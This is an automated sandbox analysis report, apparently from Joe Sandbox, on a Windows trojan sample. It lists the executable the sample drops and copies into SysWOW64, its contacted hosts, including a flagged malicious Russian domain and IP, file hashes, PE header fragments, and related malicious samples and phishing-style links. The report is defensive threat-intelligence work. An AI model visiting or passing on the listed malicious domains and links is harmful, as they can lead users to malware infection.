                                                                    https://support.hotspotshield.com/svchost.exe, 0000001E.00000003.411961992.000001D6C5E19000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.411769784.000001D6C5E03000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.411708385.000001D6C59A5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.411692699.000001D6C5993000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.411904227.000001D6C59B5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.411724964.000001D6C59B5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.411746076.000001D6C5E02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.411602296.000001D6C5996000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=svchost.exe, 00000015.00000002.318325260.000001E9FBE4B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.317838375.000001E9FBE49000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://www.disneyplus.com/legal/privacy-policysvchost.exe, 0000001E.00000003.415051605.000001D6C5993000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 00000015.00000002.318325260.000001E9FBE4B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.317838375.000001E9FBE49000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://dynamic.tsvchost.exe, 00000015.00000003.317905164.000001E9FBE45000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.317909344.000001E9FBE41000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          https://dev.virtualearth.net/REST/v1/Routes/Transitsvchost.exe, 00000015.00000003.317771744.000001E9FBE61000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://disneyplus.com/legal.svchost.exe, 0000001E.00000003.415051605.000001D6C5993000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            https://t0.ssl.ak.tiles.virtualearth.net/tiles/gensvchost.exe, 00000015.00000003.317932502.000001E9FBE39000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.296122146.000001E9FBE30000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=svchost.exe, 00000015.00000002.318325260.000001E9FBE4B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.317838375.000001E9FBE49000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://activity.windows.comsvchost.exe, 00000013.00000002.528165639.000001D77D242000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://dev.ditu.live.com/REST/v1/Locationssvchost.exe, 00000015.00000003.317771744.000001E9FBE61000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://help.disneyplus.com.svchost.exe, 0000001E.00000003.415051605.000001D6C5993000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    https://%s.dnet.xboxlive.comsvchost.exe, 00000013.00000002.528165639.000001D77D242000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    		low
                                                                                    https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 00000015.00000002.318325260.000001E9FBE4B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.317838375.000001E9FBE49000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=svchost.exe, 00000015.00000003.317838375.000001E9FBE49000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high

                                                                                        World Map of Contacted IPs

                                                                                        • No. of IPs < 25%
                                                                                        • 25% < No. of IPs < 50%
                                                                                        • 50% < No. of IPs < 75%
                                                                                        • 75% < No. of IPs

                                                                                        Public IPs

                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                        40.93.207.0
                                                                                        		microsoft-com.mail.protection.outlook.comUnited States
                                                                                        		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                        46.173.215.82
                                                                                        		svartalfheim.topRussian Federation
                                                                                        		47196GARANT-PARK-INTERNETRUtrue

                                                                                        Private

                                                                                        IP
                                                                                        192.168.2.1
                                                                                        127.0.0.1

                                                                                        General Information

                                                                                        Joe Sandbox Version:35.0.0 Citrine
                                                                                        Analysis ID:658475
                                                                                        Start date and time: 07/07/202201:00:092022-07-07 01:00:09 +02:00
                                                                                        Joe Sandbox Product:CloudBasic
                                                                                        Overall analysis duration:0h 7m 55s
                                                                                        Hypervisor based Inspection enabled:false
                                                                                        Report type:full
                                                                                        Sample file name:OcmKX57vR7 (renamed file extension from none to exe)
                                                                                        Cookbook file name:default.jbs
                                                                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                        Number of analysed new started processes analysed:41
                                                                                        Number of new started drivers analysed:0
                                                                                        Number of existing processes analysed:0
                                                                                        Number of existing drivers analysed:0
                                                                                        Number of injected processes analysed:0
                                                                                        Technologies:
                                                                                        • HCA enabled
                                                                                        • EGA enabled
                                                                                        • HDC enabled
                                                                                        • AMSI enabled
                                                                                        Analysis Mode:default
                                                                                        Analysis stop reason:Timeout
                                                                                        Detection:MAL
                                                                                        Classification:mal100.troj.evad.winEXE@37/6@5/4
                                                                                        EGA Information:
                                                                                        • Successful, ratio: 100%
                                                                                        HDC Information:
                                                                                        • Successful, ratio: 37.9% (good quality ratio 36.1%)
                                                                                        • Quality average: 87%
                                                                                        • Quality standard deviation: 25.3%
                                                                                        HCA Information:
                                                                                        • Successful, ratio: 99%
                                                                                        • Number of executed functions: 62
                                                                                        • Number of non-executed functions: 265
                                                                                        Cookbook Comments:
                                                                                        • Adjust boot time
                                                                                        • Enable AMSI

                                                                                        Warnings

                                                                                        • Exclude process from analysis (whitelisted): taskhostw.exe, BackgroundTransferHost.exe, UpdateNotificationMgr.exe, backgroundTaskHost.exe, wuapihost.exe
                                                                                        • Excluded IPs from analysis (whitelisted): 20.82.210.154, 20.112.52.29, 20.81.111.85, 20.84.181.62, 20.103.85.33, 20.53.203.50, 23.211.4.86, 20.31.108.18, 20.238.103.94, 20.223.24.244, 52.140.118.28, 52.137.106.217
                                                                                        • Excluded domains from analysis (whitelisted): asf-ris-prod-neu-azsc.northeurope.cloudapp.azure.com, iris-de-prod-azsc-weu-b.westeurope.cloudapp.azure.com, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, go.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, settings-prod-wus2-1.westus2.cloudapp.azure.com, login.live.com, sls.update.microsoft.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, www.bing.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, settings-win.data.microsoft.com, settings-prod-cin-1.centralindia.cloudapp.azure.com, atm-settingsfe-prod-weighted.trafficmanager.net, ris.api.iris.
                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                        • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                        Simulations

                                                                                        Behavior and APIs

                                                                                        TimeTypeDescription
                                                                                        01:01:49API Interceptor13x Sleep call for process: svchost.exe modified
                                                                                        01:02:37API Interceptor1x Sleep call for process: MpCmdRun.exe modified

                                                                                        Joe Sandbox View / Context

                                                                                        IPs

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                        40.93.207.0rFux2fLmkN.exeGet hashmaliciousBrowse
                                                                                          wrO2LHmVrT.exeGet hashmaliciousBrowse
                                                                                            DhcE30QZqs.exeGet hashmaliciousBrowse
                                                                                              Z5BqhIm03k.exeGet hashmaliciousBrowse
                                                                                                bCiujhSpuj.exeGet hashmaliciousBrowse
                                                                                                  W7TVCSXI5O.exeGet hashmaliciousBrowse
                                                                                                    bEkdeCiJWL.exeGet hashmaliciousBrowse
                                                                                                      POOA3yOX9U.exeGet hashmaliciousBrowse
                                                                                                        lzXXLcFd55.exeGet hashmaliciousBrowse
                                                                                                          OG9rNsihJ7.exeGet hashmaliciousBrowse
                                                                                                            zmbGUZTICp.exeGet hashmaliciousBrowse
                                                                                                              tijXCZsbGe.exeGet hashmaliciousBrowse
                                                                                                                z65PZq3pmc.exeGet hashmaliciousBrowse
                                                                                                                  XZDwTDDOcm.exeGet hashmaliciousBrowse
                                                                                                                    NNOKmCIVoi.exeGet hashmaliciousBrowse
                                                                                                                      ElnphZIEMH.exeGet hashmaliciousBrowse
                                                                                                                        szyQKudypa.exeGet hashmaliciousBrowse
                                                                                                                          YX15E4KhPT.exeGet hashmaliciousBrowse
                                                                                                                            K26ZGjvTLe.exeGet hashmaliciousBrowse
                                                                                                                              Mf4lPEF66e.exeGet hashmaliciousBrowse

                                                                                                                                Domains

                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                svartalfheim.toprFux2fLmkN.exeGet hashmaliciousBrowse
                                                                                                                                • 5.188.90.160
                                                                                                                                Ad6WJCc65q.exeGet hashmaliciousBrowse
                                                                                                                                • 5.188.89.91
                                                                                                                                vVtnVr9jVW.exeGet hashmaliciousBrowse
                                                                                                                                • 185.178.45.27
                                                                                                                                JA9znf55rV.exeGet hashmaliciousBrowse
                                                                                                                                • 80.66.64.114
                                                                                                                                Of5NDXckBh.exeGet hashmaliciousBrowse
                                                                                                                                • 80.66.64.114
                                                                                                                                tLdPr3R83m.exeGet hashmaliciousBrowse
                                                                                                                                • 80.66.64.114
                                                                                                                                MOP31Qx36f.exeGet hashmaliciousBrowse
                                                                                                                                • 80.66.64.114
                                                                                                                                ubF4rAWFG5.exeGet hashmaliciousBrowse
                                                                                                                                • 80.66.64.114
                                                                                                                                SecuriteInfo.com.Variant.Mikey.138030.20120.exeGet hashmaliciousBrowse
                                                                                                                                • 213.226.127.156
                                                                                                                                SecuriteInfo.com.Trojan.Siggen17.59826.26712.exeGet hashmaliciousBrowse
                                                                                                                                • 213.226.127.156
                                                                                                                                wrO2LHmVrT.exeGet hashmaliciousBrowse
                                                                                                                                • 213.226.127.156
                                                                                                                                microsoft-com.mail.protection.outlook.com4MFtS7taNzGet hashmaliciousBrowse
                                                                                                                                • 40.93.207.1
                                                                                                                                rFux2fLmkN.exeGet hashmaliciousBrowse
                                                                                                                                • 40.93.207.0
                                                                                                                                Ad6WJCc65q.exeGet hashmaliciousBrowse
                                                                                                                                • 40.93.207.1
                                                                                                                                vVtnVr9jVW.exeGet hashmaliciousBrowse
                                                                                                                                • 104.47.54.36
                                                                                                                                JA9znf55rV.exeGet hashmaliciousBrowse
                                                                                                                                • 40.93.207.1
                                                                                                                                Of5NDXckBh.exeGet hashmaliciousBrowse
                                                                                                                                • 104.47.54.36
                                                                                                                                tLdPr3R83m.exeGet hashmaliciousBrowse
                                                                                                                                • 52.101.24.0
                                                                                                                                MOP31Qx36f.exeGet hashmaliciousBrowse
                                                                                                                                • 40.93.207.1
                                                                                                                                ubF4rAWFG5.exeGet hashmaliciousBrowse
                                                                                                                                • 104.47.53.36
                                                                                                                                fuZcDWJRoP.exeGet hashmaliciousBrowse
                                                                                                                                • 40.93.212.0
                                                                                                                                SecuriteInfo.com.Variant.Mikey.138030.20120.exeGet hashmaliciousBrowse
                                                                                                                                • 40.93.212.0
                                                                                                                                SecuriteInfo.com.Trojan.Siggen17.59826.26712.exeGet hashmaliciousBrowse
                                                                                                                                • 104.47.53.36
                                                                                                                                wrO2LHmVrT.exeGet hashmaliciousBrowse
                                                                                                                                • 40.93.207.0
                                                                                                                                hBR6GCeDzu.exeGet hashmaliciousBrowse
                                                                                                                                • 104.47.53.36
                                                                                                                                hzIibH8wcV.exeGet hashmaliciousBrowse
                                                                                                                                • 40.93.212.0
                                                                                                                                DhcE30QZqs.exeGet hashmaliciousBrowse
                                                                                                                                • 40.93.207.0
                                                                                                                                Hiu7FE4cRw.exeGet hashmaliciousBrowse
                                                                                                                                • 40.93.212.0
                                                                                                                                PGK7oHjm77.exeGet hashmaliciousBrowse
                                                                                                                                • 40.93.212.0
                                                                                                                                eDuOsQ68XS.exeGet hashmaliciousBrowse
                                                                                                                                • 52.101.24.0
                                                                                                                                get.exeGet hashmaliciousBrowse
                                                                                                                                • 104.47.53.36

                                                                                                                                ASNs

                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                MICROSOFT-CORP-MSN-AS-BLOCKUSEveve Limited Software.zipGet hashmaliciousBrowse
                                                                                                                                • 13.107.246.45
                                                                                                                                https://netorg678867-my.sharepoint.com/:u:/g/personal/scott_norrisfs_com/EYrL-fzd4gtGkw5o4AIZ7LoBbSj3qfsqJDSfVKoQUsA2Jw?download=1Get hashmaliciousBrowse
                                                                                                                                • 13.107.136.9
                                                                                                                                b3astmode.armGet hashmaliciousBrowse
                                                                                                                                • 52.180.183.236
                                                                                                                                https://r20.rs6.net/tn.jsp?t=3Dqcuzd54ab.0.0.sqy9yutab.0&1d=preview&r=3&p=http://XPDQso.VylV0.barbodchap.ir/?=david_trinh@bio-rad.comGet hashmaliciousBrowse
                                                                                                                                • 204.79.197.200
                                                                                                                                xd.armGet hashmaliciousBrowse
                                                                                                                                • 20.233.67.235
                                                                                                                                Paid EFT Invoices.xlsxGet hashmaliciousBrowse
                                                                                                                                • 52.109.28.107
                                                                                                                                195179.htmGet hashmaliciousBrowse
                                                                                                                                • 13.107.219.45
                                                                                                                                Paid EFT Invoices.xlsxGet hashmaliciousBrowse
                                                                                                                                • 13.89.179.9
                                                                                                                                007252058.htmlGet hashmaliciousBrowse
                                                                                                                                • 13.107.246.45
                                                                                                                                xd.x86Get hashmaliciousBrowse
                                                                                                                                • 20.156.125.43
                                                                                                                                page.htmlGet hashmaliciousBrowse
                                                                                                                                • 204.79.197.200
                                                                                                                                xd.arm7Get hashmaliciousBrowse
                                                                                                                                • 20.36.89.250
                                                                                                                                Comand#U0103 de achizi#U021bie.exeGet hashmaliciousBrowse
                                                                                                                                • 13.107.43.13
                                                                                                                                arm-20220706-1817Get hashmaliciousBrowse
                                                                                                                                • 20.111.76.183
                                                                                                                                mpsl-20220706-1817Get hashmaliciousBrowse
                                                                                                                                • 20.125.75.3
                                                                                                                                x86_64-20220706-1817Get hashmaliciousBrowse
                                                                                                                                • 13.93.115.119
                                                                                                                                mips-20220706-1817Get hashmaliciousBrowse
                                                                                                                                • 20.244.127.21
                                                                                                                                Inv_00910.xlsxGet hashmaliciousBrowse
                                                                                                                                • 52.109.76.141
                                                                                                                                http://sub02.rathmoreholidayvillage.com/#/.#.aHR0cHM6Ly9wZXBlbmdpbmVlcmluZy5jby56YS9jZ2kvcmRndXNhLmNvbS9zc2NvdHRAcmRndXNhLmNvbQ==Get hashmaliciousBrowse
                                                                                                                                • 13.107.227.45
                                                                                                                                n4Lv4hSy8PGet hashmaliciousBrowse
                                                                                                                                • 40.114.148.188
                                                                                                                                GARANT-PARK-INTERNETRUPurchase OrderPDF.exeGet hashmaliciousBrowse
                                                                                                                                • 91.203.193.80
                                                                                                                                Purchase OrderPDF.ARJ.exeGet hashmaliciousBrowse
                                                                                                                                • 91.203.193.80
                                                                                                                                8hR2FFNS7r.exeGet hashmaliciousBrowse
                                                                                                                                • 91.203.193.195
                                                                                                                                x0Tb4OnQn9.exeGet hashmaliciousBrowse
                                                                                                                                • 195.22.149.178
                                                                                                                                DEVOLUCI#U00d3N DE PAGO.exeGet hashmaliciousBrowse
                                                                                                                                • 195.22.149.178
                                                                                                                                6kTYTYcjeA.exeGet hashmaliciousBrowse
                                                                                                                                • 195.22.149.178
                                                                                                                                0WHrPSUr7P.exeGet hashmaliciousBrowse
                                                                                                                                • 195.22.149.178
                                                                                                                                TTEITBT3Y1.exeGet hashmaliciousBrowse
                                                                                                                                • 195.22.149.178
                                                                                                                                j14Z9WMOPU.exeGet hashmaliciousBrowse
                                                                                                                                • 91.203.192.213
                                                                                                                                SecuriteInfo.com.W32.AIDetect.malware1.4852.exeGet hashmaliciousBrowse
                                                                                                                                • 91.203.192.213
                                                                                                                                SecuriteInfo.com.W32.AIDetect.malware1.1037.exeGet hashmaliciousBrowse
                                                                                                                                • 91.203.192.213
                                                                                                                                SecuriteInfo.com.W32.AIDetect.malware2.29982.exeGet hashmaliciousBrowse
                                                                                                                                • 91.203.192.213
                                                                                                                                http://g9m29.theoryblank.co.in/ttdsfgssf3r43gGet hashmaliciousBrowse
                                                                                                                                • 46.173.215.204
                                                                                                                                https://bit.ly/38VXW9WGet hashmaliciousBrowse
                                                                                                                                • 46.173.215.204
                                                                                                                                ptSLEB5eM7.exeGet hashmaliciousBrowse
                                                                                                                                • 46.173.215.172
                                                                                                                                42VJPPTld4.exeGet hashmaliciousBrowse
                                                                                                                                • 46.173.215.172
                                                                                                                                585be0c57969f505e1ce900d1c0a7c10fc9f69a0e2e36.exeGet hashmaliciousBrowse
                                                                                                                                • 46.173.215.172
                                                                                                                                next_stage.dllGet hashmaliciousBrowse
                                                                                                                                • 46.173.219.231
                                                                                                                                WGZc20sbnf.exeGet hashmaliciousBrowse
                                                                                                                                • 46.173.219.234
                                                                                                                                szwqZzqa7D.exeGet hashmaliciousBrowse
                                                                                                                                • 46.173.219.232

                                                                                                                                JA3 Fingerprints

                                                                                                                                No context

                                                                                                                                Dropped Files

                                                                                                                                No context

                                                                                                                                Created / dropped Files

                                                                                                                                C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:Extensible storage engine DataBase, version 0x620, checksum 0x8ad9c3c7, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):786432
                                                                                                                                Entropy (8bit):0.2507251430431233
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:U+W0StseCJ48EApW0StseCJ48E2rTSjlK/ebmLerYSRSY1J2:rSB2nSB2RSjlK/+mLesOj1J2
                                                                                                                                MD5:92F591359703F36B9A9FF397F8F3E230
                                                                                                                                SHA1:FDB44524BAC59FE012C7E6B4D4E4FB7D5A11E772
                                                                                                                                SHA-256:E9F4AB65024ADAD5680AC8F14EE4782A746C3B440DFD2B2DEF932A339FC7234E
                                                                                                                                SHA-512:4296A673851E02D77ECAF672F4CC6ACCD72A49225161954497FFC77F89D925BC9F6FF56B142E404E06DA9F78CF7B6838482F55127FBE1C2C854B648E4C0DD764
                                                                                                                                Malicious:false
                                                                                                                                Preview:....... ................e.f.3...w........................&..........w..1....z..h.(..............................3...w...........................................................................................................B...........@...................................................................................................... ........3...w..........................................................................................................................................................................................................................................1....z.y................+..a1....z..........................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\pjzcupje.exe

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\Desktop\OcmKX57vR7.exe
                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):13894656
                                                                                                                                Entropy (8bit):6.269320784920095
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24576:R9X0YMmCUMy4444444444444444444444444444444444444444444444444444U:NCU
                                                                                                                                MD5:CD1553A922DBF34673BA9D9D9A0FF5DE
                                                                                                                                SHA1:E6D68A115FC8CDA2A6C10BAD3939D2A6467465C1
                                                                                                                                SHA-256:98D4810DA53B52396776B987C7C3EBB467C4C446DA27038E3B187E951982CDA3
                                                                                                                                SHA-512:34364B41B3EAC573683EE118F1493E27E59A71FEE242B12A53F1379AC7B9EA158AF05087DF30FEC37F9C6C0BB02B036D32BD0F58FE3EFF1EE11751E091CC7F05
                                                                                                                                Malicious:true
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Q......]...]...]..G]...]..Q]...]2..]...]...]...]..V])..]..F]...]..C]...]Rich...]........PE..L...U..a......................d.............. ....@...........................g.................................................(....@g..E..........................0...................................@............................................text............................... ..`.data.....c.. ......................@....xovuhih......g......(..............@....nos..........g......*..............@....xij......... g.....................@....devo...2....0g......2..............@....rsrc....E...@g......4..............@..@................................................................................................................................................................................................................................................................

                                                                                                                                C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):55
                                                                                                                                Entropy (8bit):4.306461250274409
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                Malicious:false
                                                                                                                                Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                                                                C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
                                                                                                                                Category:modified
                                                                                                                                Size (bytes):9062
                                                                                                                                Entropy (8bit):3.162470837394252
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:cY+38+DJl+ibJ6+ioJJ+i3N+WtT+E9tD+Ett3d+E3zC3+5t:j+s+v+b+P+m+0+Q+q+/3+5t
                                                                                                                                MD5:469A10BB5545A45460814FDE0DA96E47
                                                                                                                                SHA1:1129906D4FC36DB93D953D3B026E9FF60BE94154
                                                                                                                                SHA-256:9F97A971F92BA9082BE0F05CFD1EA6ADCE1AB0955BB0E4E61DBA02F8A2AD9208
                                                                                                                                SHA-512:C4784F3FAFE247BE69A259F30A6516DE383ACAA153323989B95289FEF47A510D214E61DD504108B155B186531928869029DF0F051C1E679230D8CBE796673AF3
                                                                                                                                Malicious:false
                                                                                                                                Preview:..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. T.h.u. .. J.u.n. .. 2.7. .. 2.0.1.9. .0.1.:.2.9.:.4.9.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....E.R.R.O.R.:. .M.p.W.D.E.n.a.b.l.e.(.T.R.U.E.). .f.a.i.l.e.d. .(.8.0.0.7.0.4.E.C.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. T.h.u. .. J.u.n. .. 2.7. .. 2.0.1.9. .0.1.:.2.9.:.4.9.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.............-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.

                                                                                                                                C:\Windows\SysWOW64\ghrubsm\pjzcupje.exe (copy)

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):13894656
                                                                                                                                Entropy (8bit):6.269320784920095
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24576:R9X0YMmCUMy4444444444444444444444444444444444444444444444444444U:NCU
                                                                                                                                MD5:CD1553A922DBF34673BA9D9D9A0FF5DE
                                                                                                                                SHA1:E6D68A115FC8CDA2A6C10BAD3939D2A6467465C1
                                                                                                                                SHA-256:98D4810DA53B52396776B987C7C3EBB467C4C446DA27038E3B187E951982CDA3
                                                                                                                                SHA-512:34364B41B3EAC573683EE118F1493E27E59A71FEE242B12A53F1379AC7B9EA158AF05087DF30FEC37F9C6C0BB02B036D32BD0F58FE3EFF1EE11751E091CC7F05
                                                                                                                                Malicious:true
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Q......]...]...]..G]...]..Q]...]2..]...]...]...]..V])..]..F]...]..C]...]Rich...]........PE..L...U..a......................d.............. ....@...........................g.................................................(....@g..E..........................0...................................@............................................text............................... ..`.data.....c.. ......................@....xovuhih......g......(..............@....nos..........g......*..............@....xij......... g.....................@....devo...2....0g......2..............@....rsrc....E...@g......4..............@..@................................................................................................................................................................................................................................................................

                                                                                                                                \Device\ConDrv

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\SysWOW64\netsh.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):3773
                                                                                                                                Entropy (8bit):4.7109073551842435
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:VHILZNfrI7WFY32iIiNOmV/HToZV9It199hiALlIg39bWA1RvTBi/g2eB:VoLr0y9iIiNOoHTou7bhBlIydWALLt2w
                                                                                                                                MD5:DA3247A302D70819F10BCEEBAF400503
                                                                                                                                SHA1:2857AA198EE76C86FC929CC3388A56D5FD051844
                                                                                                                                SHA-256:5262E1EE394F329CD1F87EA31BA4A396C4A76EDC3A87612A179F81F21606ABC8
                                                                                                                                SHA-512:48FFEC059B4E88F21C2AA4049B7D9E303C0C93D1AD771E405827149EDDF986A72EF49C0F6D8B70F5839DCDBD6B1EA8125C8B300134B7F71C47702B577AD090F8
                                                                                                                                Malicious:false
                                                                                                                                Preview:..A specified value is not valid.....Usage: add rule name=<string>.. dir=in|out.. action=allow|block|bypass.. [program=<program path>].. [service=<service short name>|any].. [description=<string>].. [enable=yes|no (default=yes)].. [profile=public|private|domain|any[,...]].. [localip=any|<IPv4 address>|<IPv6 address>|<subnet>|<range>|<list>].. [remoteip=any|localsubnet|dns|dhcp|wins|defaultgateway|.. <IPv4 address>|<IPv6 address>|<subnet>|<range>|<list>].. [localport=0-65535|<port range>[,...]|RPC|RPC-EPMap|IPHTTPS|any (default=any)].. [remoteport=0-65535|<port range>[,...]|any (default=any)].. [protocol=0-255|icmpv4|icmpv6|icmpv4:type,code|icmpv6:type,code|.. tcp|udp|any (default=any)].. [interfacetype=wireless|lan|ras|any].. [rmtcomputergrp=<SDDL string>].. [rmtusrgrp=<SDDL string>].. [edge=yes|deferapp|deferuser|no (default=no)].. [security=authenticate|authenc|authdynenc|authnoencap|

                                                                                                                                Static File Info

                                                                                                                                General

                                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                Entropy (8bit):6.804284680028488
                                                                                                                                TrID:
                                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.83%
                                                                                                                                • Windows Screen Saver (13104/52) 0.13%
                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                File name:OcmKX57vR7.exe
                                                                                                                                File size:293376
                                                                                                                                MD5:db4d9ca855430682836db0a535e75594
                                                                                                                                SHA1:7a9a84d79268c30b93c48f981190182197712493
